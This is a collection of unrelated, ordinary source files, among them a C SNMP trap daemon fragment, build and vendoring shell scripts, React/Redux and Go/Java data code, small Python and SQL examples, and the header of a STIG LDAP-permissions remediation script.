        int on = 1;
        setsockopt(mcast_s, SOL_SOCKET, SO_REUSEADDR,
                   (char *) &on, sizeof(on));
    }
#endif
    if (mcast_s > 0) {
        struct sockaddr_in maddr;
        maddr.sin_family = AF_INET;
        maddr.sin_port = htons(port);
        maddr.sin_addr.s_addr = htonl(INADDR_ANY);
        if (bind(mcast_s, (struct sockaddr*) &maddr, sizeof(maddr)) == -1) {
            perror("straps: unable to bind multicast trap socket");
            close(mcast_s);
            mcast_s = -1;
        }
    }
#endif

    /*
     * Open the client socket. First unlink the name and set the umask
     * to 0. This should not make any problems and it makes security
     * people happy. (Suggested by <NAME> <<EMAIL>>)
     */
    sprintf(path, "%s-%d", SNMP_TRAP_PATH, port);   /* path[1024] is ample */
    unlink(path);
    umask(0);
    if ((serv_s = socket(AF_UNIX, SOCK_STREAM, 0)) < 0) {
        perror("straps: unable to open server socket");
        exit(1);
    }
    memset((char *) &saddr, 0, sizeof(saddr));
    saddr.sun_family = AF_UNIX;
    strcpy(saddr.sun_path, path);
    slen = sizeof(saddr) - sizeof(saddr.sun_path) + strlen(saddr.sun_path);
    printf("straps: binding to socket\n");
    if (bind(serv_s, (struct sockaddr *) &saddr, slen) < 0) {
        perror("straps: unable to bind server socket");
        exit(1);
    }
    if (listen(serv_s, 5) < 0) {
        perror("straps: unable to listen on server socket");
        exit(1);
    }
    printf("straps: listening to socket\n");

#ifdef SIGPIPE
    signal(SIGPIPE, ign_pipe);
#endif

    /*
     * Fine everything is ready; lets listen for events:
     * the for(;;) loop aborts, if the last client went away.
     */
    for (go_on = 1; go_on; ) {
        FD_ZERO(&fds);
        FD_SET(trap_s, &fds);
        FD_SET(serv_s, &fds);
        if (mcast_s > 0) {
            FD_SET(mcast_s, &fds);
        }

        /* fd's connected from clients. listen for EOF's: */
        for (i = 0; i < FD_SETSIZE; i++) {
            if (cl_addr [i] > 0)
                FD_SET(i, &fds);
        }

        rc = select(FD_SETSIZE, &fds, (fd_set *) 0, (fd_set *) 0,
                    (struct timeval *) 0);
        if (rc < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            perror("straps: select failed");
            /* bug fix: fds is undefined after a failed select; do not
             * fall through into the FD_ISSET tests below */
            continue;
        }

        printf("straps: something happened \n");
        if (FD_ISSET(trap_s, &fds)) {
            printf("straps: trap_s happened\n");
            /* read trap message and forward to clients: */
            go_on = forward_trap(trap_s, cl_addr);

        } else if (mcast_s > 0 && FD_ISSET(mcast_s, &fds)) {
            printf("straps: mcast_s happened\n");
            /* read trap message and forward to clients (the forwarding
             * code was previously duplicated here; debug output is now
             * uniform for both the unicast and multicast path): */
            go_on = forward_trap(mcast_s, cl_addr);

        } else if (FD_ISSET(serv_s, &fds)) {
            printf("straps: serv_s happened\n");
            /* accept a new client: */
            memset((char *) &daddr, 0, sizeof(daddr));
            dlen = sizeof(daddr);
            rc = accept(serv_s, (struct sockaddr *) &daddr, &dlen);
            if (rc < 0) {
                perror("straps: accept failed");
                continue;
            }
            /* bug fix: an fd >= FD_SETSIZE would overflow cl_addr[]
             * (and cannot be select()ed anyway) — reject it */
            if (rc >= FD_SETSIZE) {
                fprintf(stderr, "straps: too many clients, rejecting\n");
                close(rc);
                continue;
            }
            cl_addr [rc] = 1;

        } else {
            printf("straps: ??? happened\n");
            /* fd's connected from clients. (XXX: should check for EOF): */
            for (i = 0; i < FD_SETSIZE; i++) {
                if (cl_addr [i] > 0 && FD_ISSET(i, &fds)) {
                    cl_addr [i] = 0;
                    close(i);
                }
            }
            /* should we go on ? */
            for (go_on = 0, i = 0; i < FD_SETSIZE; i++) {
                go_on += cl_addr [i] > 0;
            }
        }
    } /* end for (;;) */

    unlink(path);
    printf("straps: bye\n");
    return 0;
}
|
<filename>lang/py/cookbook/v2/source/cb2_4_20_exm_2.py
# Bug fix: Python has no printf builtin; use print with %-formatting.
print('Result tuple is: %r' % (result_tuple,))
|
#!/bin/bash
###############################################################################
# Copyright (c) 2018 Advanced Micro Devices, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
# Resolve the directory containing this script so helpers can be sourced
# regardless of the caller's working directory.
BASE_DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)

set -e
# Report which command failed (and its exit code) when the script aborts.
trap 'lastcmd=$curcmd; curcmd=$BASH_COMMAND' DEBUG
trap 'errno=$?; print_cmd=$lastcmd; if [ $errno -ne 0 ]; then echo "\"${print_cmd}\" command failed with exit code $errno."; fi' EXIT

source "$BASE_DIR/common/common_options.sh"
parse_args "$@"

# This script only builds meta-packages which do not have source code.
# If we are not building packages, skip it.
if [ "${ROCM_FORCE_PACKAGE}" = false ]; then
    exit 0
fi

# Need to be able to build RPM files if we want to create meta-packages
if [ "${ROCM_LOCAL_INSTALL}" = false ] || [ "${ROCM_INSTALL_PREREQS}" = true ]; then
    echo "Installing software required to build meta-packages"
    echo "You will need to have root privileges to do this."
    sudo yum -y install rpm-build
    # Prereqs-only invocation: stop once the tools are installed.
    if [ "${ROCM_INSTALL_PREREQS}" = true ] && [ "${ROCM_FORCE_GET_CODE}" = false ]; then
        exit 0
    fi
fi

# Set up source-code directory
if [ "$ROCM_SAVE_SOURCE" = true ]; then
    SOURCE_DIR=${ROCM_SOURCE_DIR}
    if [ "${ROCM_FORCE_GET_CODE}" = true ] && [ -d "${SOURCE_DIR}/meta_packages" ]; then
        rm -rf "${SOURCE_DIR}/meta_packages"
    fi
else
    SOURCE_DIR=$(mktemp -d)
fi
mkdir -p "${SOURCE_DIR}/meta_packages"
cd "${SOURCE_DIR}/meta_packages"

if [ "${ROCM_FORCE_GET_CODE}" = true ]; then
    echo "No code download is required for this. Exiting."
    exit 0
fi
if [ "${ROCM_FORCE_BUILD_ONLY}" = true ]; then
    # Typo fix: message previously read "Existing."
    echo "No build is required for this. Exiting."
    exit 0
fi

# Our libraries ROCm meta-package is:
# * rocm-libs, which depends/installs: rocblas, rocfft, rocrand, and hipblas
if [ "${ROCM_FORCE_PACKAGE}" = true ]; then
    for pkg_name in rocm-libs; do
        mkdir -p "${SOURCE_DIR}/meta_packages/${pkg_name}"
        cd "${SOURCE_DIR}/meta_packages/${pkg_name}/"
        # Copy the spec template next to where rpmbuild will run.
        pushd "${BASE_DIR}/../common/"
        cp "./${pkg_name}.spec" "${SOURCE_DIR}/meta_packages/${pkg_name}/"
        popd
        # Substitute the release version and output directory into the spec.
        sed -i 's/ROCM_PKG_VERSION/'${ROCM_VERSION_LONG}'/g' ./${pkg_name}.spec
        sed -i 's#ROCM_OUTPUT_DIR#'${ROCM_OUTPUT_DIR%/}'#g' ./${pkg_name}.spec
        mkdir -p "$(pwd)/${ROCM_OUTPUT_DIR}/.info/"
        echo "${ROCM_VERSION_LONG}" > "$(pwd)/${ROCM_OUTPUT_DIR}/.info/version-libs"
        # Build the RPM in a throw-away topdir, then collect the artifact.
        RPM_TEMP_DIR=$(mktemp -d)
        rpmbuild -bb --clean --define "_topdir ${RPM_TEMP_DIR}" "./${pkg_name}.spec"
        cp "${RPM_TEMP_DIR}"/RPMS/x86_64/${pkg_name}-*.rpm .
        rm -rf "${RPM_TEMP_DIR}"
        echo "Copying `ls -1 ${pkg_name}-*.rpm` to ${ROCM_PACKAGE_DIR}"
        mkdir -p "${ROCM_PACKAGE_DIR}"
        cp ${pkg_name}-*.rpm "${ROCM_PACKAGE_DIR}"
        # Unless this is a purely local install, replace any previously
        # installed copy of the meta-package with the new build.
        if [ "${ROCM_LOCAL_INSTALL}" = false ]; then
            ROCM_PKG_IS_INSTALLED=$(rpm -qa | grep ${pkg_name} | wc -l)
            if [ "${ROCM_PKG_IS_INSTALLED}" -gt 0 ]; then
                FULL_PKG_NAME=$(rpm -qa | grep ${pkg_name} | head -n 1)
                sudo rpm -e --nodeps "${FULL_PKG_NAME}"
            fi
            sudo rpm -i ${pkg_name}-*.rpm
        fi
    done
fi

if [ "$ROCM_SAVE_SOURCE" = false ]; then
    rm -rf "${SOURCE_DIR}"
fi
|
<filename>src/pages/App/App.tsx
import CssBaseline from '@material-ui/core/CssBaseline';
import * as React from 'react';
import { Route, Switch } from 'react-router-dom';
import Header from '../../components/Header';
import Home from '../Home';
import StockDetail from '../StockDetail';
import classes from './App.scss';
/**
 * Root component: applies the Material-UI CSS baseline, renders the app
 * header, and routes "/" to Home and "/stock/:symbol" to StockDetail.
 */
class App extends React.Component {
  public render() {
    return (
      <div className={classes.App}>
        <CssBaseline />
        <Header />
        <Switch>
          {/* exact match so "/stock/..." does not also render Home */}
          <Route exact={true} path="/" component={Home}/>
          <Route path="/stock/:symbol" component={StockDetail}/>
        </Switch>
      </div>
    );
  }
}

export default App;
|
#!/usr/bin/env bash
set -e

# Run from the repository root so vendor/ lands in the right place.
cd "$(dirname "$BASH_SOURCE")/.."

# Downloads dependencies into vendor/ directory
mkdir -p vendor
cd vendor

# clone <vcs> <pkg> <rev>: fetch one dependency at an exact revision into
# src/<pkg>, stripping VCS metadata and nested vendored dependencies so
# the result is a plain source snapshot.
clone() {
    vcs=$1
    pkg=$2
    rev=$3

    pkg_url=https://$pkg
    target_dir=src/$pkg

    echo -n "$pkg @ $rev: "

    # Start from a clean checkout if the package was vendored before.
    if [ -d $target_dir ]; then
        echo -n 'rm old, '
        rm -fr $target_dir
    fi

    echo -n 'clone, '
    case $vcs in
    git)
        # --no-checkout + hard reset pins the tree to the exact revision.
        git clone --quiet --no-checkout $pkg_url $target_dir
        ( cd $target_dir && git reset --quiet --hard $rev )
        ;;
    hg)
        hg clone --quiet --updaterev $rev $pkg_url $target_dir
        ;;
    esac

    echo -n 'rm VCS, '
    ( cd $target_dir && rm -rf .{git,hg} )

    echo -n 'rm vendor, '
    ( cd $target_dir && rm -rf vendor Godeps/_workspace )

    echo done
}

# the following lines are in sorted order, FYI
clone git github.com/Sirupsen/logrus v0.7.3 # logrus is a common dependency among multiple deps
clone git github.com/docker/libtrust 230dfd18c232
clone git github.com/go-check/check 64131543e7896d5bcc6bd5a76287eb75ea96c673
clone git github.com/go-fsnotify/fsnotify v1.2.0
clone git github.com/gorilla/context 14f550f51a
clone git github.com/gorilla/mux e444e69cbd
clone git github.com/kr/pty 05017fcccf
clone git github.com/tchap/go-patricia v2.1.0
clone hg code.google.com/p/go.net 84a4013f96e0
clone hg code.google.com/p/gosqlite 74691fb6f837

# get distribution packages
clone git github.com/docker/distribution d957768537c5af40e4f4cd96871f7b2bde9e2923
# Keep only the digest and registry/api subtrees of docker/distribution.
mv src/github.com/docker/distribution/digest tmp-digest
mv src/github.com/docker/distribution/registry/api tmp-api
rm -rf src/github.com/docker/distribution
mkdir -p src/github.com/docker/distribution
mv tmp-digest src/github.com/docker/distribution/digest
mkdir -p src/github.com/docker/distribution/registry
mv tmp-api src/github.com/docker/distribution/registry/api

clone git github.com/docker/libcontainer 90f8aa670f1f424041059060c7c63fe4dee2e441
# libcontainer deps (see src/github.com/docker/libcontainer/update-vendor.sh)
clone git github.com/coreos/go-systemd v2
clone git github.com/godbus/dbus v2
clone git github.com/syndtr/gocapability 8e4cdcb
|
import { combineReducers } from 'redux';
import { makeCommunicationReducer } from 'shared/helpers/redux';
import { ReducersMap } from 'shared/types/redux';
import * as NS from '../../namespace';
import { initial } from '../data/initial';
// tslint:disable:max-line-length
// Tracks the request lifecycle of each API-keys operation; every
// sub-reducer reacts to its own EXECUTE / SUCCESS / FAIL action triple.
export const communicationReducer = combineReducers<NS.IReduxState['communication']>({
  // fetching the list of API keys
  getApiKeys: makeCommunicationReducer<NS.IGetApiKeys, NS.IGetApiKeysSuccess, NS.IGetApiKeysFail>(
    'API_KEYS:GET_API_KEYS',
    'API_KEYS:GET_API_KEYS_SUCCESS',
    'API_KEYS:GET_API_KEYS_FAIL',
    initial.communication.getApiKeys,
  ),
  // creating a new API key
  addApiKey: makeCommunicationReducer<NS.IAddApiKey, NS.IAddApiKeySuccess, NS.IAddApiKeyFail>(
    'API_KEYS:ADD_API_KEY',
    'API_KEYS:ADD_API_KEY_SUCCESS',
    'API_KEYS:ADD_API_KEY_FAIL',
    initial.communication.addApiKey,
  ),
  // deleting an existing API key
  removeApiKey: makeCommunicationReducer<NS.IRemoveApiKey, NS.IRemoveApiKeySuccess, NS.IRemoveApiKeyFail>(
    'API_KEYS:REMOVE_API_KEY',
    'API_KEYS:REMOVE_API_KEY_SUCCESS',
    'API_KEYS:REMOVE_API_KEY_FAIL',
    initial.communication.removeApiKey,
  )
} as ReducersMap<NS.IReduxState['communication']>);
|
package com.therootcoder.sample.masterslavespring.annotation;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
/**
 * Declares that a repository is used for read-only (data-fetch) operations
 * only. Repositories annotated with {@code @ReadOnly} must not declare or
 * use DML (data-modifying) methods.
 *
 * @author <NAME>
 * @since 22-Mar-2019
 **/
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
public @interface ReadOnly {
}
|
<gh_stars>1-10
package entity
import (
"context"
"github.com/blushft/strana/modules/sink/reporter/store"
"github.com/blushft/strana/modules/sink/reporter/store/ent"
"github.com/blushft/strana/modules/sink/reporter/store/ent/app"
)
// App is the application entity exposed by the reporter module.
// NOTE(review): only ID and Name carry db/json tags; the remaining
// fields rely on default mapping — confirm this is intentional.
type App struct {
	ID         int    `db:"id" json:"id"`
	Name       string `db:"name" json:"name"`
	Version    string
	Build      string
	Properties map[string]interface{}
}

// AppReader is the read-only view over stored apps.
type AppReader interface {
	List() ([]*App, error)
	Get(int) (*App, error)
}

// AppWriter lists the mutating operations.
// NOTE(review): appManager does not implement these in this file.
type AppWriter interface {
	Create(*App) error
	Update(*App) error
	Delete(*App) error
}

// appRepo combines read and write access.
type appRepo interface {
	AppReader
	AppWriter
}

// AppManager is the full read/write repository contract.
type AppManager interface {
	appRepo
}

// AppReporter is the read-only subset used for reporting.
type AppReporter interface {
	AppReader
}

// appManager is the ent-store-backed implementation.
type appManager struct {
	store *store.Store
}

// NewAppService wires an appManager to the given store.
func NewAppService(s *store.Store) *appManager {
	return &appManager{
		store: s,
	}
}
// List returns every stored App.
func (mgr *appManager) List() ([]*App, error) {
	c := mgr.store.Client().App
	recs, err := c.Query().All(context.TODO())
	if err != nil {
		return nil, err
	}
	return siteSchemasToEntities(recs), nil
}

// Get returns the App with the given primary key.
func (mgr *appManager) Get(id int) (*App, error) {
	c := mgr.store.Client().App
	rec, err := c.Get(context.TODO(), id)
	if err != nil {
		return nil, err
	}
	return siteSchemaToEntity(rec), nil
}

// GetByName returns every App whose name matches exactly.
func (mgr *appManager) GetByName(name string) ([]*App, error) {
	c := mgr.store.Client().App
	rec, err := c.Query().Where(app.Name(name)).All(context.TODO())
	if err != nil {
		return nil, err
	}
	return siteSchemasToEntities(rec), nil
}
// siteSchemasToEntities converts a slice of ent records to entities.
// NOTE(review): the "site" prefix looks copied from a sibling entity
// file; these helpers operate on App records.
func siteSchemasToEntities(sch []*ent.App) []*App {
	var res []*App
	for _, rec := range sch {
		res = append(res, siteSchemaToEntity(rec))
	}
	return res
}

// siteSchemaToEntity maps one ent.App record onto the App entity.
func siteSchemaToEntity(sch *ent.App) *App {
	return &App{
		ID:         sch.ID,
		Name:       sch.Name,
		Version:    sch.Version,
		Build:      sch.Build,
		Properties: sch.Properties,
	}
}

// siteEntityCreate builds (but does not execute) an insert for e.
func siteEntityCreate(c *ent.AppClient, e *App) *ent.AppCreate {
	return c.Create().
		SetName(e.Name).
		SetVersion(e.Version).
		SetBuild(e.Build).
		SetProperties(e.Properties)
}

// siteEntityUpdate builds (but does not execute) an update from e's fields.
func siteEntityUpdate(c *ent.AppClient, e *App) *ent.AppUpdate {
	return c.Update().
		SetName(e.Name).
		SetVersion(e.Version).
		SetBuild(e.Build).
		SetProperties(e.Properties)
}
|
<reponame>olivierdemeijer/connect-sdk-java
package com.globalcollect.gateway.sdk.java.gc.product.definitions;
import java.util.List;
public class FixedListValidator {

    // The values a field may take; null until explicitly set.
    private List<String> allowedValues = null;

    /** @return the list of allowed values, or null if none was set */
    public List<String> getAllowedValues() {
        return allowedValues;
    }

    /** Replaces the list of allowed values. */
    public void setAllowedValues(List<String> value) {
        this.allowedValues = value;
    }
}
|
#!/bin/bash
# Print the newest tag of the my-devices/sdk GitHub repo, or "unknown"
# when the newest tag is not a plain vMAJOR.MINOR.PATCH version.
version=`git ls-remote --tags --sort -refname https://github.com/my-devices/sdk.git | grep -v '\^{}' | head -1 | awk '{ print $2 }' | sed 's#refs/tags/##'`
# Accept only strict semantic-version tags (1-3 digits per component).
if [[ "$version" =~ ^v[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] ; then
    echo $version
else
    echo unknown
fi
|
import tensorflow as tf

# Fetch the MNIST handwritten-digit dataset (downloads on first run).
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()

# Scale each image row-wise to unit norm, exactly as before.
x_train = tf.keras.utils.normalize(x_train, axis=1)
x_test = tf.keras.utils.normalize(x_test, axis=1)

# Same architecture, declared via the Sequential list form:
# flatten -> 128-unit ReLU layer -> 10-way softmax output.
model = tf.keras.models.Sequential([
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(128, activation=tf.nn.relu),
    tf.keras.layers.Dense(10, activation=tf.nn.softmax),
])

# Identical optimizer / loss / metric configuration.
model.compile(optimizer='adam',
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])

# Three passes over the training set.
model.fit(x_train, y_train, epochs=3)

# Report held-out loss and accuracy.
val_loss, val_acc = model.evaluate(x_test, y_test)
print(val_loss, val_acc)
|
const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const btcController = require('./btcController').default;

app.use(bodyParser.json()); // support json encoded bodies
app.use(bodyParser.urlencoded({ extended: true })); // support encoded bodies

// Liveness check.
app.get('/', function (req, res) {
    res.send('Hello World!');
});

app.listen(3000, function () {
    console.log('Example app listening on port 3000!');
});

// Webhook endpoint: acknowledge immediately, then (for 'block' events)
// trigger a lookup of the block.
// NOTE(review): req.body.txid is forwarded to getBlockById for a 'block'
// event — presumably it carries the block identifier; confirm with the
// notifier that posts here.
app.post('/notify', function (req, res) {
    console.log("/notify");
    console.log(req.body);
    res.json({ok: true});
    if (req.body.c === 'block') {
        console.log('new block');
        btcController.getBlockById(req.body.txid);
    } else {
        console.log('Other event');
    }
});

// Read-only REST lookups, delegated to the controller.
app.get('/block/height/:height', btcController.getBlockByHeight);
app.get('/tx/:txid', btcController.getTxById);
|
<reponame>MiguelDelPinto/LCOM_TPs<filename>lab4/i8042.h<gh_stars>0
#ifndef _LCOM_I8042_H_
#define _LCOM_I8042_H_

#include <lcom/lcf.h>
#include <minix/sysutil.h>

/** @defgroup i8042 i8042
 * @{
 *
 * Constants for programming the i8042 Keyboard.
 */

/* General macros */
#define KBD_IRQ 1                 /* keyboard IRQ line */
#define MOUSE_IRQ 12              /* PS/2 mouse IRQ line */
#define DELAY_US 20000            /* default KBC wait, in microseconds */
#define WAIT_KBC tickdelay(micros_to_ticks(DELAY_US))
#define DELAY(n) tickdelay(micros_to_ticks(n))
#define MAX_TRIES 5               /* attempts before giving up on the KBC */

/* I/O port addresses */
#define KBC_STATUS_PORT 0x64      /* read: status register */
#define KBC_OUT_BUF 0x60          /* read: output buffer */
#define KBC_INPT_BUF_COM 0x64     /* write: commands */
#define KBC_INPT_BUF_ARG 0x60     /* write: command arguments */

/* Status register masks */
#define OUT_BUF_FULL BIT(0)       /* data available to read */
#define INPT_BUF_FULL BIT(1)      /* do not write while set */
#define TRANSMIT_TIME_OUT BIT(5)
#define RECEIVE_TIME_OUT BIT(6)
#define PARITY_ERROR BIT(7)

//PS2 mode
#define AUXILIARY_DEVICE BIT(5)   /* byte originated from the mouse */
#define PS2_TIME_OUT BIT(6)

/* Scancodes */
#define MAKE_CODE BIT(7)          /* bit 7 distinguishes make/break codes */
#define INCOMPLETE_CODE 0xE0      /* prefix of two-byte scancodes */
#define ESC_MAKE_CODE 0x01
#define ESC_BREAK_CODE 0x81

/* KBC commands */
#define WRITE_CMD_BYTE 0x60
#define READ_CMD_BYTE 0x20
#define WRITE_MOUSE 0xD4          /* forward next byte to the mouse */
#define ENABLE_DATA_REPORT 0xF4
#define DISABLE_DATA_REPORT 0xF5
#define STREAM_MODE 0xEA
#define READ_DATA 0xEB

/* Mouse acknowledgment bytes */
#define ACK 0xFA                  /* everything OK */
#define NACK 0xFE                 /* invalid byte, resend */
#define ERROR 0xFC                /* second consecutive invalid byte */

/* Packet struct */
#define LB BIT(0)                 /* left button */
#define RB BIT(1)                 /* right button */
#define MB BIT(2)                 /* middle button */
#define X_SIGN BIT(4)
#define Y_SIGN BIT(5)
#define X_OVF BIT(6)
#define Y_OVF BIT(7)

/* Mouse packet */
#define FIRST_PACKET BIT(3)       /* always set in a packet's first byte */

/* KBC arguments */
#define ENABLE_INTERRUPTS 1

#endif /* _LCOM_I8042_H_ */
|
package org.librairy.harvester.datosgobes.executions;
import org.librairy.harvester.datosgobes.model.Row;
import org.librairy.harvester.datosgobes.service.ParsingService;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.*;
import java.time.Instant;
import java.time.temporal.ChronoUnit;
import java.util.ArrayList;
import java.util.List;
import java.util.function.Function;
import java.util.stream.Collectors;
/**
* @author <NAME>, Carlos <<EMAIL>>
*/
public class ParseData {

    private static final Logger LOG = LoggerFactory.getLogger(ParseData.class);

    /** Output CSV holding the datasets with tokenized descriptions. */
    public static final String filePath = "/Users/cbadenes/Documents/OEG/Cloud/projects/DesafioAporta_2017/datasets-gob-es-parsed.csv";

    /** Parses one CSV line into a Row (method reference replaces the old verbose lambda). */
    private static Function<String, Row> mapToItem = Row::fromCSV;

    /**
     * Reads every line of the given CSV file and parses each into a Row.
     * Returns an empty list (and prints the stack trace) on I/O failure.
     *
     * @param csvFile path of the CSV file to read
     * @return parsed rows, possibly empty
     */
    private static List<Row> load(String csvFile) {
        List<Row> rows = new ArrayList<Row>();
        // try-with-resources: the original leaked the reader whenever an
        // exception was thrown between open and close.
        try (BufferedReader br = new BufferedReader(
                new InputStreamReader(new FileInputStream(new File(csvFile))))) {
            rows = br.lines().map(mapToItem).collect(Collectors.toList());
        } catch (IOException e) {
            e.printStackTrace();
        }
        return rows;
    }

    /**
     * Tokenizes the description of every dataset downloaded by
     * {@link DownloadData} and writes the result to {@link #filePath},
     * logging the total elapsed time.
     */
    public static void main(String[] args) throws Exception {

        String inputPath = DownloadData.filePath;
        String outputPath = filePath;

        // Initialize Services
        ParsingService parsingService = new ParsingService();

        // Tokenize descriptions
        Instant start = Instant.now();
        // try-with-resources guarantees the writer is flushed and closed
        // even if a parsing step throws.
        try (FileWriter writer = new FileWriter(new File(outputPath))) {
            load(inputPath).parallelStream()
                    .map(d -> d.setDescription(parsingService.tokenize(d.getDescription())))
                    .forEach(d -> {
                        try {
                            // Bug fix: FileWriter is not thread-safe and this
                            // runs on a parallel stream — serialize the writes
                            // so output lines cannot interleave.
                            synchronized (writer) {
                                writer.write(d.toCSV() + "\n");
                            }
                            System.out.println("Dataset processed: " + d.getId());
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    });
        }
        Instant end = Instant.now();

        LOG.info("Datasets parsed from datos.gob.es at: " + outputPath);
        LOG.info("Executed in: " + ChronoUnit.MINUTES.between(start,end) + "min " + (ChronoUnit.SECONDS.between(start,end)%60) + "secs");
    }
}
|
-- One row per order: the customer who placed it, the product ordered,
-- and the order date (inner joins drop orders lacking either side).
SELECT c.Name as CustomerName, p.Name as ProductName, o.order_date
FROM customers c
JOIN orders o ON c.CustomerId = o.CustomerId
JOIN products p ON p.ProductId = o.ProductId;
|
import sys
from computer import Computer
from copy import deepcopy
def move(comp, position, step_count):
    """Probe all four neighbours of `position` using copies of the droid.

    For each unexplored neighbour, the Intcode computer `comp` is
    deep-copied, fed one movement command (i+1; presumably 1=north,
    2=south, 3=west, 4=east — confirm against the droid protocol) and its
    status output recorded in the module-level `layout` dict (0 appears
    to mean wall, non-zero walkable, 2 the target). Walkable neighbours
    are appended to the module-level BFS `queue`.

    Returns the target position if reached on this expansion, else None.
    """
    step_count += 1
    for i in range(4):
        pos = deepcopy(position)
        if i == 0:
            pos[1] += 1   # command 1
        elif i == 1:
            pos[1] -= 1   # command 2
        elif i == 2:
            pos[0] -= 1   # command 3
        else:
            pos[0] += 1   # command 4
        if tuple(pos) in layout:
            continue      # already explored
        # Fresh copy so each direction is tried from the same droid state.
        new_comp = deepcopy(comp)
        new_comp.input(i+1)
        new_comp.run()
        out = new_comp.output()[0]
        layout[tuple(pos)] = out
        if out == 0:
            continue      # wall: droid did not move
        else:
            queue.append((new_comp, pos, step_count))
        if out == 2:
            # Part 1 answer: fewest moves to reach the target cell.
            print(step_count)
            return pos
    return None
def fill(position, step_count):
    """Recursively flood-fill the explored map starting at `position`.

    Visited open cells are recorded in the module-level `flood` dict
    (value = step at which they were reached). Returns the length of the
    longest newly visited chain, i.e. how many steps the fill needs to
    cover everything reachable from `position`.
    """
    step_count += 1
    n = (position[0], position[1] + 1)
    s = (position[0], position[1] - 1)
    # NOTE(review): w/e use x+1/x-1, the mirror of move()'s convention;
    # the fill is direction-symmetric, so the result is unaffected.
    w = (position[0] + 1, position[1])
    e = (position[0] - 1, position[1])
    nn = 0
    sn = 0
    wn = 0
    en = 0
    # Recurse into each known, non-wall (layout value != 0), not-yet-
    # flooded neighbour, adding one step per level.
    if n in layout and layout[n] != 0 and n not in flood:
        flood[n] = step_count
        nn = 1 + fill(n, step_count)
    if s in layout and layout[s] != 0 and s not in flood:
        flood[s] = step_count
        sn = 1 + fill(s, step_count)
    if w in layout and layout[w] != 0 and w not in flood:
        flood[w] = step_count
        wn = 1 + fill(w, step_count)
    if e in layout and layout[e] != 0 and e not in flood:
        flood[e] = step_count
        en = 1 + fill(e, step_count)
    return max(nn, sn, wn, en)

# BFS exploration: start the droid at the origin and expand the frontier
# until the whole maze is mapped; `move` records the target when found.
c = Computer(sys.argv[1])
layout = {(0, 0): 1}
queue = [(c, [0, 0], 0)]
oxygen_pos = []
while len(queue):
    item = queue.pop(0)
    r = move(item[0], item[1], item[2])
    if r != None:
        oxygen_pos = r

# Part 2: flood-fill outward from the target and print the fill time.
flood = {tuple(oxygen_pos): 0}
print(fill(tuple(oxygen_pos), 0))
|
class StatsCalculator():
    """Descriptive statistics (mean, median, mode) over a list of numbers."""

    def __init__(self, arr):
        # arr: non-empty list of numbers to summarize.
        self.arr = arr

    # To calculate mean
    def calculate_mean(self):
        """Return the arithmetic mean of the stored values."""
        return (sum(self.arr)/len(self.arr))

    # To calculate median
    def calculate_median(self):
        """Return the median.

        Works on a sorted copy so the caller's list order is preserved
        (the original sorted self.arr in place as a side effect).
        """
        ordered = sorted(self.arr)
        mid = len(ordered) // 2
        if len(ordered) % 2 == 0:
            # Bug fix: average BOTH middle elements. The original computed
            # a + b/2 due to a misplaced parenthesis, only halving the
            # second middle element.
            return (ordered[mid] + ordered[mid - 1]) / 2
        else:
            return ordered[mid]

    # To calculate mode
    def calculate_mode(self):
        """Return the most frequent value (first encountered on ties)."""
        # max() keeps the first element reaching the highest count,
        # matching the original loop's tie-breaking.
        return max(self.arr, key=self.arr.count)
|
#Aqueduct - Compliance Remediation Content
#Copyright (C) 2011,2012 Vincent C. Passaro (vincent.passaro@gmail.com)
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor,
#Boston, MA 02110-1301, USA.
#!/bin/bash
######################################################################
#By Tummy a.k.a Vincent C. Passaro #
#Vincent[.]Passaro[@]gmail[.]com #
#www.vincentpassaro.com #
######################################################################
#_____________________________________________________________________
#| Version | Change Information | Author | Date |
#|__________|_______________________|____________________|____________|
#| 1.0 | Initial Script | Vincent C. Passaro | 20-oct-2011|
#| | Creation | | |
#|__________|_______________________|____________________|____________|
#######################DISA INFORMATION###############################
#Group ID (Vulid): V-22573
#Group Title: GEN008340
#Rule ID: SV-26960r1_rule
#Severity: CAT II
#Rule Version (STIG-ID): GEN008340
#Rule Title: If the system is using LDAP for authentication or account information, the LDAP TLS key file must have mode 0600 or less permissive.
#
#Vulnerability Discussion: LDAP can be used to provide user authentication and account information, which are vital to system security. The LDAP client configuration must be protected from unauthorized modification.
#
